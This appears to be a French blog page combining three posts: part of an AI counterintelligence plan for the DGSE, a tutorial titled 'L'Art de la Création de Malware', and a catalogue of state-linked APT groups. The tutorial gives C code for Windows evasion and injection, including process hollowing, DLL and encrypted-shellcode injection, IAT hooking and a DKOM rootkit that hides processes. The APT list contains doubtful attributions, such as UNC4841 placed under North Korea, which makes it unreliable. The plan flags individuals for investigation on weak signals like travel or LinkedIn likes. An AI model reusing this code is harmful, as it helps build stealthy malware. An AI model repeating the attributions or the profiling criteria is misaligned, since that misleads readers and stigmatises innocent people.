• Principe : Modélisation des relations entre individus (réseaux sociaux, transactions).
• Applications :
  • Visualisation des liens faibles (ex. : un fonctionnaire français et un diplomate russe ont le même contact à Moscou).
  • Détection de communautés suspectes (ex. : un groupe de lobbyistes pro-russes en contact avec des militaires).

5. Reconnaissance biométrique

• Principe : Comparaison de visages ou de voix avec des bases de données russes.
• Applications :
  • Vérification si un « étudiant russe » en France correspond à un agent connu du SVR (via des bases comme Frontex ou Interpol).

1. Outils concrets pour la DGSE

Exemple français : La DGSE utilise déjà des outils similaires pour la lutte antiterroriste. Une adaptation pour le contre-espionnage est envisageable, avec des algorithmes spécifiques aux méthodes russes.

3. Étapes pour mettre en place un système IA anti-agents dormants

Étape 1 : Collecte et centralisation des données

• Sources :
  • ANSSI (cyber).
  • Douanes (voyages).
  • Banques (transactions).
  • Réseaux sociaux (via des partenariats légaux).
• Cadre juridique :
  • Utiliser la loi renseignement (2015) et le RGPD (avec dérogations pour la sécurité nationale).

Étape 2 : Entraînement de l’IA

• Jeux de données :
  • Profils d’agents russes déjà démasqués (ex. : affaires passées).
  • Données synthétiques pour simuler des scénarios.
• Collaboration :
  • Partenariat avec le CEA ou Inria pour développer des algorithmes sur mesure.

Étape 3 : Détection et alerte

• Seuils d’alerte :
  • Un individu avec 3 signaux faibles (ex. : voyage en Russie + contact avec un diplomate + intérêt pour la défense) déclenche une enquête humaine.
• Validation par des analystes :
  • L’IA ne remplace pas le jugement humain, mais priorise les cibles.

Étape 4 : Action

• Surveillance discrète (filature, écoutes légales).
• Recrutement en tant qu’agent double (si possible).
• Neutralisation (expulsion, arrestation).

4. Limites et risques
5. Faux positifs et biais

• Risque : L’IA peut stigmatiser des innocents (ex. : un universitaire étudiant la Russie).
• Solution :
  • Audit régulier des algorithmes par des experts indépendants.
  • Transparence partielle (ex. : expliquer à un suspect pourquoi il est surveillé).

1. Contournement par les RIS

• Les agents russes adaptent leurs méthodes :
  • Utilisation de messageries chiffrées (Signal, Telegram).
  • Fausses pistes (ex. : créer des profils « leurres » pour saturer l’IA).
• Solution :
  • Mettre à jour en continu les modèles d’IA avec les dernières tactiques russes.

1. Enjeux éthiques et juridiques

• Vie privée : La surveillance de masse est illégale en France sans motif valable.
• Solution :
  • Cibler uniquement les personnes à risque (ex. : hauts fonctionnaires, militaires).
  • Contrôle parlementaire (via la Délégation parlementaire au renseignement).

5. Exemple concret : un scénario d’utilisation

Cas : Un ingénieur de Naval Group (spécialisé dans les sous-marins) est repéré par l’IA parce que :

1. Il a voyagé 5 fois à Saint-Pétersbourg en 2 ans (sans raison professionnelle).
2. Son compte LinkedIn a été « liké » par un attaché militaire russe.
3. Il a recherché des articles sur les systèmes de propulsion nucléaire.
4. Il a reçu un virement de 5 000 € d’une société offshore.

Processus :

1. L’IA signale le profil à la DGSE.
2. Une équipe vérifie manuellement les données.
3. Si confirmation, surveillance rapprochée ou interpellation.

6. Comparaison internationale

7. Recommandations pour la DGSE

1. Investir dans des partenariats tech :
   • Collaborer avec Thales, Atos, ou des startups françaises (ex. : Dataiku).
2. Former des data scientists :
   • Créer une unité dédiée au sein de la DGSE, mixant experts en IA et anciens agents.
3. Coopérer avec l’UE :
   • Partager des bases de données avec l’Allemagne et les Pays-Bas (cibles majeures des RIS).
4. Anticiper l’évolution des menaces :
   • Intégrer l’analyse des deepfakes et des bots sur les réseaux sociaux.

8. Conclusion : l’IA comme multiplicateur de force

L’IA ne remplacera pas le travail humain de la DGSE, mais elle peut : ✅ Automatiser la détection des signaux faibles. ✅ Réduire le temps d’enquête de plusieurs mois à quelques jours. ✅ Identifier des réseaux invisibles aux méthodes traditionnelles.

Prochaine étape : La France pourrait lancer un projet pilote sur un secteur critique (ex. : énergie ou défense), en s’inspirant du modèle israélien (Unit 8200).

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)

par Aics-sr | Fév 10, 2026 | Moments d'histoire

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)

Techniques Avancées d’Évasion et d’Injection

Décortiquer les mécanismes utilisés par les acteurs malveillants pour détourner l’exécution du code, échapper aux détections et s’implanter profondément dans les systèmes Windows.

Nous aborderons des concepts allant de la manipulation bas-niveau des structures système (comme le PEB) aux techniques d’injection de shellcode chiffré, en passant par l’émulation de tactiques attribuées à des groupes APT (Advanced Persistent Threat) tels qu’APT28, APT29 et APT33.

 Note importante : Ce contenu est fourni à des fins éducatives et de recherche en sécurité offensive. La compréhension de ces techniques est essentielle pour développer des défenses robustes.

1. Les Fondamentaux : Windows API et Liaison Dynamique

L’API Windows (WinAPI) est l’interface fondamentale permettant aux programmes d’interagir avec le système d’exploitation. Pour un développeur de malware, la manière dont les fonctions sont chargées peut faire la différence entre la détection et la furtivité.

Liaison Statique vs Dynamique

• Liaison statique : Le code de la fonction est intégré directement dans l’exécutable.

int main(void) {

    MessageBoxA(0, “Foo Here.”, “Info”, 0);

    return 0;

}

• Problème : Facilement détectable par les outils de sécurité.
• Liaison dynamique : La fonction est chargée à l’exécution depuis une DLL.

int main(void) {

    size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA(”USER32.dll”), “MessageBoxA”);

    def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;

    msgbox_a(0, “Foo Here.”, “Info”, 0);

    return 0;

}

Avantage : Réduit la signature statique et permet une résolution d’API à la volée.

2. Accès au PEB (Process Environment Block)

Le PEB est une structure de données critique contenant des informations sur le processus en cours d’exécution. Il est accessible en mode utilisateur et permet de récupérer les adresses de base des modules chargés (DLL).

Localisation du PEB

• x86 : fs:[0x30]
• x64 : gs:[0x60]

Exemple : Récupération de l’adresse de base d’une DLL

size_t GetModHandle(wchar_t *libName) {

    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30);

    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {

        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks);

        if (StrStrIW(libName, data->BaseDllName.Buffer))

            return data->DllBase;

    }

    return 0;

}

Cette fonction parcourt la liste des modules chargés pour trouver kernel32.dll et récupérer son adresse de base.

3. Résolution Dynamique d’API via les Tables d’Export

Une fois le module de base obtenu, on peut parser sa table d’export pour localiser l’adresse d’une fonction spécifique.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

    // Parsing des en-têtes PE

    PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);

    PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);

    IMAGE_DATA_DIRECTORY dataDir_exportDir = ntHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    // Accès à la table d’export

    PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);

    DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);

    DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);

    WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

    // Recherche de la fonction par nom

    for (size_t i = 0; i < exportTable->NumberOfNames; i++) {

        char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);

        if (!stricmp(sz_CurrApiName, szFuncName)) {

            WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;

            return moduleBase + arrFuncs[num_CurrApiOrdinal – 1];

        }

    }

    return 0;

}

Cette technique permet d’appeler des API comme WinExec de manière totalement dynamique, sans import statique.

int main() {

    size_t kernelBase = GetModHandle(L”kernel32.dll”);

    size_t ptr_WinExec = GetFuncAddr(kernelBase, “WinExec”);

    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)(”calc”, SW_SHOW);

    return 0;

}

4. IAT Hooking – Détournement de la Table d’Import

L’IAT (Import Address Table) contient les adresses des fonctions importées par un module. En hookant l’IAT, on peut intercepter et modifier les appels d’API.

void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr) {

    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];

    for (; impModuleList->Name; impModuleList++) {

        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];

        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];

        for (int i = 0; arr_apiNames[i].u1.Function; i++) {

            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];

            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name)) {

                apiAddr = arr_callVia[i].u1.Function;

                arr_callVia[i].u1.Function = callback; // Remplacement de l’adresse

                break;

            }

        }

    }

}

Utilisation : Hook de MessageBoxA pour modifier son comportement.

5. Process Hollowing – Remplacement de Processus Légitimes

Cette technique consiste à créer un processus légitime en état suspendu, puis à remplacer son code et ses données par une charge malveillante.

Étapes clés :

1. Création du processus suspendu avec CreateProcessA et le flag CREATE_SUSPENDED.
2. Allocation de mémoire dans le processus cible via VirtualAllocEx.
3. Écriture des en-têtes PE et des sections dans la mémoire allouée avec WriteProcessMemory.
4. Mise à jour du contexte du thread (registre EAX) pour pointer vers le point d’entrée du nouveau code.
5. Reprise de l’exécution avec ResumeThread.

// Création du processus suspendu

CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI);

// Injection du code malveillant

WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)

    WriteProcessMemory(PI.hProcess, LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),

                       LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),

                       SectionHeader[i].SizeOfRawData, 0);

// Modification du contexte et reprise

CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;

SetThreadContext(PI.hThread, LPCONTEXT(CTX));

ResumeThread(PI.hThread);

Cas réel : Cette méthode est similaire à celle utilisée par X-Agent (APT28/Fancy Bear).

6. Techniques d’Injection de DLL

L’injection de DLL permet d’introduire du code dans un processus cible. Plusieurs méthodes existent :

1. Via LoadLibraryA

• Alloue de la mémoire pour le chemin de la DLL.
• Utilise CreateRemoteThread pour appeler LoadLibraryA avec ce chemin.

WriteProcessMemory(hHandle, dllPathAddr, dllPath, strlen(dllPath), NULL);

CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibAddr, dllPathAddr, 0, NULL);

1. Via NtCreateThreadEx (API non documentée)

• Plus furtif, évite les détections basées sur CreateRemoteThread.
• Nécessite la résolution dynamique de NtCreateThreadEx depuis ntdll.dll.

7. Injection de Shellcode et Évasion

Le shellcode est du code machine autonome, souvent utilisé pour des exécutions directes en mémoire.

Exemple : Injection de shellcode chiffré AES (Technique Early Bird – APT33)

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

    HCRYPTPROV hProv; HCRYPTHASH hHash; HCRYPTKEY hKey;

    CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);

    CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);

    CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);

    CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);

    CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);

    // Nettoyage

    CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0);

    return 0;

}

Processus :

1. Création d’un processus suspendu (svchost.exe).
2. Déchiffrement du shellcode en mémoire.
3. Allocation et écriture du shellcode dans le processus cible.
4. Exécution via QueueUserAPC pour une injection furtive.

8. Développement d’un Rootkit en Mode Kernel

Un rootkit opère au niveau le plus bas du système pour masquer sa présence.

1. Driver Entry Point

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {

    DbgPrint(”Hello World!”);

    return STATUS_SUCCESS;

}

1. Dissimulation de Processus via DKOM (Direct Kernel Object Manipulation)

NTSTATUS HideProcess(ULONG pid) {

    PEPROCESS currentEProcess = PsGetCurrentProcess();

    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;

    // Parcours de la liste des processus

    // Suppression du processus cible de la liste chaînée

    blink->Flink = flink;

    flink->Blink = blink;

    return STATUS_SUCCESS;

}

Cette technique manipule la structure EPROCESS pour rendre un processus invisible aux outils système.

1. Injection de DLL en Mode Kernel

• Utilisation de PsSetLoadImageNotifyRoutine pour surveiller le chargement de kernel32.dll.
• Injection via APC (Asynchronous Procedure Call) pour exécuter du code dans un thread cible.

Conclusion : L’Évolution Continue des Techniques Malveillantes

Nous avons parcouru un large éventail de techniques, de la manipulation basique d’API à la création de rootkits kernel. Chaque méthode présente des avantages et des limitations, et leur efficacité dépend du contexte d’utilisation et des mesures de défense en place.

Rappel : Ces connaissances doivent servir à renforcer la cybersécurité, non à nuire. La compréhension offensive est un pilier essentiel de la défense proactive.

LE MONDE COMPLEXE DES APT

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Les APT (Advanced Persistent Threat) sont des groupes de cybermenace parrainés par des États ou des acteurs organisés, spécialisés dans le cyberespionnage, le sabotage ou le vol de données sensibles. Ils ciblent souvent des gouvernements, des entreprises stratégiques, des infrastructures critiques ou des organisations internationales.

Voici une liste des principaux groupes APT actifs, classés par pays ou affiliation présumée, avec leurs spécialités et cibles typiques. Ces informations sont basées sur des rapports publics (ANSSI, NSA, Mandiant, Kaspersky, etc.) et des analyses de cybersécurité.

1. Groupes liés à la Russie

APT29 (Cozy Bear, The Dukes, Nobelium)

• Affiliation : Service de renseignement étranger russe (SVR).
• Cibles : Gouvernements (États-Unis, Europe), think tanks, partis politiques, laboratoires pharmaceutiques (ex : piratage des vaccins COVID-19).
• Méthodes : Phishing sophistiqué, malwares comme WellMess ou CosmicDuke.
• Exemple : Attaque contre SolarWinds (2020).

APT28 (Fancy Bear, Sofacy, Sednit)

• Affiliation : GRU (renseignement militaire russe).
• Cibles : Ministères de la Défense, organisations sportives (ex : dopage aux JO), médias.
• Méthodes : Campagnes de désinformation, malwares (X-Agent, Zebrocy).
• Exemple : Piratage du Comité national démocrate (DNC) en 2016.

Sandworm (Voodoo Bear, Iron Viking)

• Affiliation : GRU (Unité 74455).
• Cibles : Infrastructures critiques (énergie, télécoms), Ukraine.
• Méthodes : Cyberattaques destructrices (NotPetya, BlackEnergy).
• Exemple : Attaque contre le réseau électrique ukrainien (2015, 2016).

Gamaredon (Primitive Bear, Armageddon)

• Affiliation : FSB (sécurité intérieure russe).
• Cibles : Ukraine, dissidents russes, ONG.
• Méthodes : Malwares persistants (Pterodo), attaques par email.

2. Groupes liés à la Chine

APT41 (Winnti, Barium, Double Dragon)

• Affiliation : Ministère de la Sécurité d’État (MSS) + cybercriminels « patriotiques ».
• Cibles : Entreprises (jeux vidéo, santé, technologie), gouvernements asiatiques.
• Méthodes : Vol de propriété intellectuelle, ransomware (Winnti malware).
• Exemple : Attaques contre des studios de jeux (ex : Capcom, EA).

APT10 (MenuPass, Stone Panda, Cloud Hopper)

• Affiliation : MSS (Bureau 12 de Tianjin).
• Cibles : Gouvernements (Japon, Europe), prestataires IT (ex : HPE, IBM).
• Méthodes : Compromission de clouds, accès persistants.
• Exemple : Campagne Cloud Hopper (2016–2018).

APT31 (Zirconium, Judgment Panda)

• Affiliation : MSS.
• Cibles : Candidats politiques (ex : campagne de Biden en 2020), entreprises aérospatiales.
• Méthodes : Phishing ciblé, malwares (Badfly).

APT27 (Emissary Panda, Bronze Union)

• Affiliation : MSS.
• Cibles : Diplomates, organisations internationales (ex : ASEAN).
• Méthodes : Backdoors (ZxShell), attaques « watering hole ».

3. Groupes liés à l’Iran

APT33 (Elfin, Refined Kitten)

• Affiliation : Corps des Gardiens de la révolution islamique (IRGC).
• Cibles : Secteur énergétique (Arabie saoudite, États-Unis), dissidents iraniens.
• Méthodes : Malwares destructeurs (Shamoon), attaques par supply chain.

APT34 (OilRig, Helix Kitten)

• Affiliation : Ministère du renseignement iranien (MOIS).
• Cibles : Entreprises pétrolières, universités, gouvernements du Golfe.
• Méthodes : Outils personnalisés (PowRuner, BONDUPDATER).

APT35 (Charming Kitten, Phosphorus)

• Affiliation : IRGC.
• Cibles : Journalistes, militants, responsables politiques (ex : campagne de Trump en 2020).
• Méthodes : Ingénierie sociale, faux profils sur les réseaux sociaux.

4. Groupes liés à la Corée du Nord

APT38 (BlueNoroff, Stardust Chollima)

• Affiliation : Bureau 121 (renseignement nord-coréen).
• Cibles : Banques (ex : Bangladesh Bank, 2016), cryptomonnaies.
• Méthodes : Attaques SWIFT, malwares (FASTCash).

Lazarus Group

• Affiliation : Bureau 121 + cybercriminels.
• Cibles : Entreprises (Sony Pictures, 2014), infrastructures critiques.
• Méthodes : Ransomware (WannaCry), supply chain attacks.

5. Groupes liés à d’autres pays

APT32 (OceanLotus, SeaLotus) – Vietnam

• Affiliation : Gouvernement vietnamien.
• Cibles : Entreprises étrangères au Vietnam, médias, dissidents.
• Méthodes : Malwares (KerrDown), attaques ciblées.

APT-C-23 (Gaza Hackers) – Palestine/Hamas

• Affiliation : Groupes pro-palestiniens.
• Cibles : Israël, institutions juives.
• Méthodes : Phishing, malwares mobiles.

APT-C-35 (DoNot Team) – Inde/Pakistan

• Affiliation : Incertaine (liens avec l’Inde ou le Pakistan).
• Cibles : Gouvernements sud-asiatiques, militaires.
• Méthodes : Malwares Android (StealJob).

APT44 est un nom récent (2024) attribué par Mandiant (filiale de Google) au groupe Sandworm, un acteur cyber russe particulièrement actif et dangereux, lié au GRU (renseignement militaire russe). Ce groupe est responsable de certaines des cyberattaques les plus destructrices des dernières années, notamment en Ukraine et contre des infrastructures critiques en Europe et aux États-Unis

Résumé des alias d’APT44

6. Groupes « Mercenaires » (affiliation floue)

Dark Basin (Deceptikons)

• Affiliation : Société privée (ex : BellTroX en Inde).
• Cibles : Avocats, militants, entreprises (ex : ExxonMobil).
• Méthodes : Phishing, harcellement en ligne.

Bahamut

• Affiliation : Inconnue (liens avec le Moyen-Orient ou l’Asie du Sud).
• Cibles : Gouvernements, médias, ONG.
• Méthodes : Faux sites web, malwares (WindTail).

1. Russie : Les plus actifs en 2025–2026

APT44 (Sandworm, Seashell Blizzard, FROZENBARENTS)

• Statut : Le plus actif et dangereux en 2025–2026.
• Affiliation : GRU (renseignement militaire russe).
• Cibles récentes :
  • Infrastructures critiques en Ukraine et en Europe (énergie, transports).
  • Organisations soutenant l’Ukraine (ONG, gouvernements, entreprises logistiques).
  • Jeux Olympiques (campagnes de désinformation et sabotage).
• Méthodes :
  • Malwares destructeurs (CaddyWiper, PartyTicket).
  • Attaques coordonnées avec des opérations militaires (ex : coupures d’électricité en Ukraine, octobre 2022 et 2025).
  • Utilisation de false flags (fausses attributions à d’autres pays).
• Exemple récent :
  • Déploiement du ransomware Prestige contre des entreprises polonaises et françaises (2025).
  • Campagne contre les JO d’hiver 2026 (Milan-Cortina).

APT29 (Cozy Bear, SVR)

• Statut : Toujours très actif, surtout en espionnage politique.
• Cibles récentes :
  • Gouvernements européens et américains (vol de documents classifiés).
  • Laboratoires pharmaceutiques et biotech.
• Méthodes :
  • Phishing ultra-ciblé, malwares (WellMess, CosmicDuke).
  • Exploitation de vulnérabilités zero-day dans les logiciels collaboratifs (ex : Microsoft 365).

Gamaredon (Primitive Bear, FSB)

• Statut : Actif en Ukraine et contre les dissidents russes.
• Cibles récentes :
  • Administrations locales ukrainiennes.
  • Journalistes et militants anti-guerre.

2. Chine : Montée en puissance des groupes « polyvalents »

APT41 (Winnti, Double Dragon)

• Statut : Top 3 des groupes les plus actifs (cybercrime + espionnage).
• Cibles récentes :
  • Entreprises high-tech (Taïwan, Corée du Sud, Europe).
  • Secteur de la santé (vol de données sur les vaccins et médicaments).
• Méthodes :
  • Combinaison d’espionnage et de ransomware pour financer ses opérations.
  • Attaques via des sous-traitants IT (supply chain).

APT31 (Zirconium, MSS)

• Statut : En pleine expansion, ciblant les élections et les infrastructures.
• Cibles récentes :
  • Campagnes électorales (États-Unis, Taïwan, Inde).
  • Opérateurs télécoms en Asie du Sud-Est.
• Exemple récent :
  • Piratage de boîtes mail de responsables politiques américains (2025).

APT10 (MenuPass, MSS)

• Statut : Spécialisé dans l’espionnage économique à long terme.
• Cibles récentes :
  • Prestataires cloud (pour accéder à leurs clients gouvernementaux).
  • Universités et centres de recherche (vol de propriété intellectuelle).

3. Iran : Focus sur le Moyen-Orient et les dissidents

APT33 (Elfin, IRGC)

• Statut : Actif contre Israël, l’Arabie saoudite et les États-Unis.
• Cibles récentes :
  • Secteur énergétique (cyberattaques contre des raffineries).
  • Dissidents iraniens en Europe et aux États-Unis.
• Méthodes :
  • Malwares destructeurs (Shamoon v3).
  • Attaques par watering hole (sites web piégés).

APT34 (OilRig, MOIS)

• Statut : Cible les pays du Golfe et les entreprises pétrolières.
• Cibles récentes :
  • Sociétés pétrolières en Arabie saoudite et aux Émirats.
  • Ambassades israéliennes.

4. Corée du Nord : Cybercrime et financement du régime

Lazarus Group (APT38)

• Statut : Leader mondial du cybercrime étatique.
• Cibles récentes :
  • Banques et plateformes de cryptomonnaies (vols records en 2025).
  • Entreprises aérospatiales et de défense (vol de technologies).
• Méthodes :
  • Ransomware (Maui).
  • Attaques via des faux recrutements sur LinkedIn.

Kimsuky

• Statut : Spécialisé dans l’espionnage politique.
• Cibles récentes :
  • Experts en Corée du Sud et au Japon.
  • Think tanks travaillant sur la péninsule coréenne.

5. Nouveaux acteurs ou groupes en émergence (2024–2026)

APT-C-50 (Aliases : « Unfading Sea Haze », Chine)

• Statut : Nouveau groupe identifié en 2025, lié au MSS.
• Cibles :
  • Gouvernements d’Asie du Sud-Est (Philippines, Malaisie).
  • Infrastructures portuaires (espionnage et sabotage potentiel).

APT-C-63 (Aliases : « Tropic Trooper », Chine/Taïwan)

• Statut : Cible Taïwan et les entreprises travaillant avec le gouvernement taïwanais.
• Méthodes :
  • Attaques via des mises à jour logicielles compromises.

UNC4841 (Corée du Nord, lié à Lazarus)

• Statut : Groupe spécialisé dans les attaques contre les médias et les ONG.
• Cibles récentes :
  • Journalistes couvrant la Corée du Nord.
  • Organisations humanitaires.

6. Autres groupes notables

Turla (Snake, Russie, FSB/SVR)

• Statut : Moins médiatisé mais toujours actif en espionnage de haut niveau.
• Cibles récentes :
  • Ambassades et ministères des Affaires étrangères en Europe.

Bahamut (Origine incertaine, probablement Moyen-Orient/Asie du Sud)

• Statut : Groupe « mercenaire », louant ses services.
• Cibles récentes :
  • Entreprises et responsables politiques en Inde et au Pakistan.

Tableau récapitulatif des APT les plus actifs (2025–2026)

 Tendances clés en 2025–2026

1. Convergence espionnage/cybercrime :
   • Des groupes comme APT41 ou Lazarus mélangent vol de données et extorsion pour financer leurs opérations.
2. Attaques contre les infrastructures critiques :
   • APT44 et APT33 ciblent de plus en plus les secteurs énergie, eau et transports.
3. Utilisation de l’IA :
   • Génération automatique de phishing (deepfake vocal, emails ultra-personnalisés).
4. Ciblage des chaînes d’approvisionnement :
   • Compromission de prestataires IT pour atteindre leurs clients (ex : SolarWinds bis).
5. Guerre d’influence :
   • APT44 et APT31 mènent des campagnes de désinformation autour des élections et des JO.

Comment la DGSE et l’ANSSI les combattent ?

La France, via la DGSE (pour le renseignement) et l’ANSSI (pour la cybersécurité), surveille et contrarie ces groupes par :

• Détection précoce (outils comme Eole pour l’ANSSI).
• Collaboration internationale (avec la NSA, le GCHQ, etc.).
• Attribution publique (ex : accusation de la Chine pour APT31 en 2021).
• Renforcement des défenses (ex : certification des opérateurs d’importance vitale).